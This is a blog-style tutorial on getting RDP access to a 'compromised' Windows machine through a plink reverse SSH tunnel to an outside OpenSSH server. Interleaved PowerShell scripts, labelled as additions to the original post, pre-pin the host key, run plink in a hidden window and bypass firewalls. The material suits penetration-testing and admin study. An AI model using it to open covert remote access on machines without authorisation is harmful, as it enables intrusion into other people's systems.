Windows 10 and 11 Reverse SSH RDP Connection


Establishing an RDP Connection Over a Reverse SSH Tunnel Using Windows Native OpenSSH Server

This guide explains how to establish an RDP connection over a reverse SSH tunnel using the native OpenSSH server in Windows 10/11 and plink.exe (part of PuTTY). The server's host key is pre-accepted on the compromised machine, so plink never stops at its interactive host-key prompt; that matters when the tunnel is launched without a console, as in penetration-testing scenarios. The same setup tunnels other TCP protocols over SSH to traverse firewalls.


Prerequisites

  1. Windows 10/11 machine: Native OpenSSH server enabled.
  2. Plink.exe: Downloaded from the PuTTY website.
  3. Admin rights: Required on the SSH server to install and configure sshd. On the compromised machine, plink.exe and a reg import into HKCU run as a normal user, but Remote Desktop must already be enabled there, and the account you RDP with must be an administrator or a member of Remote Desktop Users on that machine.

Step 1: Enable and Configure the OpenSSH Server

1. Install the OpenSSH Server (if not already installed):

  • Open Settings > Apps > Optional Features.
  • Click Add a feature, search for OpenSSH Server, and install it.

2. Start the SSH Server:

  • Open PowerShell as Administrator.
  • Run:
    Start-Service sshd
  • Ensure it starts on boot:
    Set-Service sshd -StartupType Automatic

3. Allow SSH in the Firewall (installing the capability normally creates an inbound rule named OpenSSH-Server-In-TCP already; add this one only if it is missing):

  • Run:
    New-NetFirewallRule -Name sshd -DisplayName "OpenSSH Server" -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22

4. Verify SSH Server:

  • From another machine, test the connection using:
    ssh username@<OpenSSH-Server-IP>

Step 2: Create an SSH User

  1. Open PowerShell as Administrator.
  2. Add a new user:
    net user testuser Password123! /add
  3. No group membership is needed for SSH login: by default sshd accepts any local account. Restrict it to this one instead by adding AllowUsers testuser to C:\ProgramData\ssh\sshd_config (above any Match block) and restarting sshd, and keep testuser out of Administrators; it only needs to hold the tunnel. The Remote Desktop Users group matters on the compromised machine, for the account you later RDP with, not on the SSH server.
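Steps 1 and 2 as one idempotent script for an elevated PowerShell on the SSH server. This is an added example, not code from the original post: the account name testuser comes from the post, the sshd_config path is the Windows OpenSSH default under ProgramData, and the AllowUsers/AllowTcpForwarding hardening is my addition.

```powershell
# Added example (not from the original post): server-side setup for Steps 1 and 2.
# Run in an elevated PowerShell on the Windows 10/11 machine that will be the SSH server.
# Assumptions: account name testuser (from the post); sshd_config at the Windows
# OpenSSH default path %ProgramData%\ssh\sshd_config.
$ErrorActionPreference = 'Stop'
$user = 'testuser'

# --- Step 1.1: install the OpenSSH Server capability if it is not present ---
$cap = Get-WindowsCapability -Online | Where-Object Name -like 'OpenSSH.Server*'
if ($cap.State -ne 'Installed') {
    Add-WindowsCapability -Online -Name $cap.Name | Out-Null
}

# --- Step 1.2: start sshd once so it generates sshd_config and its host keys,
#     and make it start on boot ---
Set-Service -Name sshd -StartupType Automatic
Start-Service -Name sshd

# --- Step 2: create the tunnel account. The password is read from the console so
#     it never lands in shell history. No group membership is needed for SSH login;
#     keep this account out of Administrators and Remote Desktop Users. ---
if (-not (Get-LocalUser -Name $user -ErrorAction SilentlyContinue)) {
    $pw = Read-Host -AsSecureString "Password for $user"
    New-LocalUser -Name $user -Password $pw | Out-Null
}

# --- Harden sshd_config: only testuser may log in; TCP forwarding stays on because
#     the reverse tunnel (-R) needs it. The directives are inserted before the first
#     Match block, since anything after a Match line applies to that block only. ---
$cfg  = Join-Path $env:ProgramData 'ssh\sshd_config'
$keep = Get-Content $cfg | Where-Object {
    $_ -notmatch '^\s*#?\s*(AllowUsers|AllowTcpForwarding|PasswordAuthentication)\b'
}
$new = @("AllowUsers $user", 'AllowTcpForwarding yes', 'PasswordAuthentication yes')
$before = @(); $after = @(); $seenMatch = $false
foreach ($line in $keep) {
    if (-not $seenMatch -and $line -match '^\s*Match\b') { $seenMatch = $true }
    if ($seenMatch) { $after += $line } else { $before += $line }
}
Set-Content -Path $cfg -Value ($before + $new + $after) -Encoding ascii
Restart-Service -Name sshd

# --- Step 1.3: the capability install normally creates this inbound rule itself;
#     add one only if it is missing ---
if (-not (Get-NetFirewallRule -Name 'OpenSSH-Server-In-TCP' -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -Name 'OpenSSH-Server-In-TCP' -DisplayName 'OpenSSH Server (sshd)' `
        -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22 | Out-Null
}

# --- Step 1.4: verify locally; from another host, run: ssh testuser@<server-ip> ---
Get-Service -Name sshd | Select-Object Status, StartType
Get-NetTCPConnection -LocalPort 22 -State Listen | Select-Object LocalAddress, LocalPort, OwningProcess
```

The Match-block handling is the part worth noting: the default Windows sshd_config ends with a Match Group administrators block, so simply appending AllowUsers to the file would silently scope it to administrators instead of restricting logins globally.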

Step 3: Configure plink.exe for the Reverse Tunnel

  1. Download plink.exe from the PuTTY website.
  2. Copy plink.exe to the compromised machine.

Step 4: Pre-Accept the SSH Host Key (No Interactive Prompt)

  1. From a machine that can connect to the OpenSSH server, accept the host key once interactively:
    plink.exe -ssh <OpenSSH-Server-IP> -l testuser -pw Password123!
    • When prompted, accept the host key.
    • plink stores it in the registry under:
      HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys
  2. Export the registry key:
    • Open regedit.
    • Navigate to:
      HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys
    • Export the key and copy the .reg file to the compromised machine.
  3. Import the key on the compromised machine (it lands in HKCU, so no admin rights are needed):
    reg import <path-to-exported-reg-file>
  4. Alternatively, skip the registry entirely: pass the server's host-key fingerprint with plink's -hostkey option and add -batch, so plink connects only when the key matches and fails instead of prompting otherwise.

Step 5: Establish the Reverse SSH Tunnel

  1. On the compromised machine, execute plink.exe:
    plink.exe -ssh -P 22 -R 127.0.0.1:12345:127.0.0.1:3389 -l testuser -pw Password123! <OpenSSH-Server-IP>
    • -R 127.0.0.1:12345:127.0.0.1:3389: asks sshd on the SSH server to listen on 127.0.0.1:12345; every connection it accepts there is carried back through the tunnel and delivered to 127.0.0.1:3389 (RDP) on the compromised machine. Because the listener is bound to loopback, only processes on the SSH server itself can reach it, and no GatewayPorts change is needed.
    • Replace <OpenSSH-Server-IP> with the actual IP address of the SSH server.
    • Keep this plink process running for as long as the tunnel is needed; -N suppresses the remote shell and -batch makes plink fail rather than prompt.
  2. Confirm on the SSH server that sshd now holds the listener (for example with netstat -ano, which should show 127.0.0.1:12345 in LISTENING state owned by the sshd process).

Step 6: Connect to the RDP Session

  1. On the SSH server machine, open the RDP client:
    • Press Win + R > Type mstsc.
    • Connect to:
      127.0.0.1:12345
  2. Enter valid credentials for the compromised machine.
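Steps 4 to 6 scripted as three functions, one per machine. This is an added example, not code from the original post: Get-SshHostFingerprint runs on a host you control that has the Windows OpenSSH client tools (ssh-keyscan, ssh-keygen) and replaces the registry export with a pinned fingerprint passed to plink's -hostkey; Start-ReverseRdpTunnel runs on the compromised machine next to plink.exe; Test-ReverseListener runs on the SSH server before you open mstsc. Assumptions: 192.0.2.10 is a placeholder server address, testuser and port 12345 come from the post, and plink.exe is a recent build (0.75 or newer) that accepts a SHA256 fingerprint for -hostkey.

```powershell
# Added example (not from the original post): Steps 4 to 6 as functions.
# Assumptions: placeholder server 192.0.2.10; testuser and port 12345 from the post;
# plink.exe 0.75+ for -hostkey with a SHA256: fingerprint; ssh-keyscan/ssh-keygen
# available on the controlled host (Windows OpenSSH client).

function Get-SshHostFingerprint {
    # Controlled host: fetch the server's ed25519 host key and return its SHA256
    # fingerprint. Pinning this value replaces the registry export/import of Step 4.
    param([Parameter(Mandatory)][string]$Server)
    $tmp = Join-Path $env:TEMP 'hostkey.txt'
    ssh-keyscan -t ed25519 $Server | Out-File -Encoding ascii $tmp
    # ssh-keygen -lf prints e.g. "256 SHA256:... 192.0.2.10 (ED25519)"
    $fp = (ssh-keygen -lf $tmp) -split '\s+' | Where-Object { $_ -like 'SHA256:*' } | Select-Object -First 1
    Remove-Item $tmp
    if (-not $fp) { throw "Could not read a host key from $Server" }
    return $fp
}

function Start-ReverseRdpTunnel {
    # Compromised machine: launch plink with the pinned host key and a loopback-only
    # reverse forward. -batch: never prompt (a key mismatch fails instead of hanging);
    # -N: tunnel only, no remote shell.
    param(
        [Parameter(Mandatory)][string]$Server,
        [Parameter(Mandatory)][string]$Fingerprint,
        [string]$User = 'testuser',
        [int]$RemotePort = 12345,
        [string]$PlinkPath = '.\plink.exe'
    )
    # The tunnel is useless unless RDP is already listening here.
    if (-not (Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue)) {
        throw 'Nothing is listening on 3389: enable Remote Desktop on this host first.'
    }
    $secure = Read-Host -AsSecureString "Password for $User"
    $plain  = [Runtime.InteropServices.Marshal]::PtrToStringAuto(
                  [Runtime.InteropServices.Marshal]::SecureStringToBSTR($secure))
    # Caveat: -pw still exposes the password on plink's command line to anyone who
    # can list processes on this machine. A password containing spaces would also
    # need quoting for Start-Process.
    $plinkArgs = @('-ssh', '-batch', '-N', '-P', '22', '-hostkey', $Fingerprint,
                   '-R', "127.0.0.1:${RemotePort}:127.0.0.1:3389",
                   '-l', $User, '-pw', $plain, $Server)
    $p = Start-Process -FilePath $PlinkPath -ArgumentList $plinkArgs -WindowStyle Hidden -PassThru
    Start-Sleep -Seconds 3
    if ($p.HasExited) {
        throw "plink exited with code $($p.ExitCode): check the fingerprint, the credentials, and that sshd allows TCP forwarding."
    }
    return $p   # keep this process alive for as long as the tunnel is needed
}

function Test-ReverseListener {
    # SSH server: sshd must own a LISTEN socket on 127.0.0.1:<port> before mstsc can connect.
    param([int]$RemotePort = 12345)
    $l = Get-NetTCPConnection -LocalAddress 127.0.0.1 -LocalPort $RemotePort -State Listen -ErrorAction SilentlyContinue |
         Select-Object -First 1
    if (-not $l) { return $false }
    return (Get-Process -Id $l.OwningProcess).ProcessName -eq 'sshd'
}

# Usage, in order, one line per machine:
#   $fp = Get-SshHostFingerprint -Server 192.0.2.10                 # controlled host
#   Start-ReverseRdpTunnel -Server 192.0.2.10 -Fingerprint $fp      # compromised machine
#   if (Test-ReverseListener) { mstsc.exe /v:127.0.0.1:12345 }      # SSH server
```

Carry the fingerprint to the compromised machine together with plink.exe; with -batch, a fingerprint that does not match the server's key makes plink exit non-zero, which Start-ReverseRdpTunnel reports instead of leaving a hung process behind.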

Notes

  • Use a strong password for SSH user accounts, and give testuser no privileges beyond holding the tunnel.
  • -pw puts the password on plink's command line, where any local user who can list processes on the compromised machine can read it; accept that trade-off knowingly and use a dedicated account you can retire afterwards.
  • If tunneling over the internet, ensure port forwarding is set up on your router/firewall for the OpenSSH server.
  • Test on a local LAN before deploying in a live environment.

Conclusion

Using the native Windows OpenSSH server simplifies the setup and removes the need for third-party SSH servers like FreeSSHd. The above method allows penetration testers, admins, or users to securely tunnel RDP sessions or other protocols over SSH without unnecessary complexity.


More from mild0d_io